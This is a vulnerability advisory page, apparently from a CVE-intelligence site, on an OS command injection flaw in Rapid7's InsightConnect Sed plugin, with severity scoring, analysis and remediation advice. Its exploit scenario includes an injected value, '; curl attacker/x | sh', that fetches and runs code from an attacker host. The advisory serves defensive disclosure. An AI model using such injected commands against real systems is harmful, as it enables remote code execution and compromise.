Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Network-reachable SOAR API with low complexity but requires an authenticated workflow-authoring user (PR:L); command execution yields full C/I/A impact within the unchanged plugin scope.
Primary rating from Vendor (rapid7).
CVSS VectorVendor: rapid7
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionCVE.org
OS Command Injection vulnerability in Rapid7 InsightConnect Sed Plugin on Linux allows authenticated attackers to execute arbitrary OS commands via the expression parameter due to insufficient input validation.
AnalysisAI
OS command injection in the Rapid7 InsightConnect Sed Plugin on Linux lets an authenticated operator inject arbitrary shell commands through the plugin's expression parameter, which is passed to the underlying sed invocation without sufficient sanitization. Because InsightConnect is a SOAR orchestration platform, a low-privileged workflow author or connected user (PR:L) can achieve full code execution in the plugin's runtime context (C:H/I:H/A:H, CVSS 8.8). …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an authenticated InsightConnect user (CVSS PR:L) who can supply or influence the Sed plugin's `expression` parameter - typically a workflow author, or any data source feeding that parameter within a runnable workflow - on a Linux deployment where the Sed plugin is installed and used. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, base 8.8) describes a network-reachable, low-complexity attack requiring some authentication (PR:L) and no user interaction, with high impact to confidentiality, integrity and availability - a serious score for an authenticated flaw. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An authenticated InsightConnect user with workflow-authoring privileges (or an attacker who has phished/compromised such an account) configures a step that calls the Sed plugin and supplies an `expression` value containing shell metacharacters or a sed `e` command, e.g. embedding `; curl attacker/x | sh`. … |
| Remediation | Update the InsightConnect Sed Plugin to the latest fixed version published on the Rapid7 extension marketplace (https://extensions.rapid7.com/extension/sed); no exact fix version was provided in the input data, so confirm the patched build number directly from that advisory before deploying - No vendor-released patch version identified at time of analysis in the supplied data. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
24 hours: Identify all InsightConnect instances with Sed Plugin enabled; audit current operator access and review recent plugin execution logs for suspicious activity. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Insightconnect Sed Plugin
View allArbitrary file read in Rapid7's InsightConnect Sed Plugin on Linux exposes sensitive host filesystem contents to authent
Arbitrary file write in the Rapid7 InsightConnect Sed Plugin on Linux lets an authenticated attacker supply a crafted ex
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-39153
GHSA-v3gg-5r82-j6rc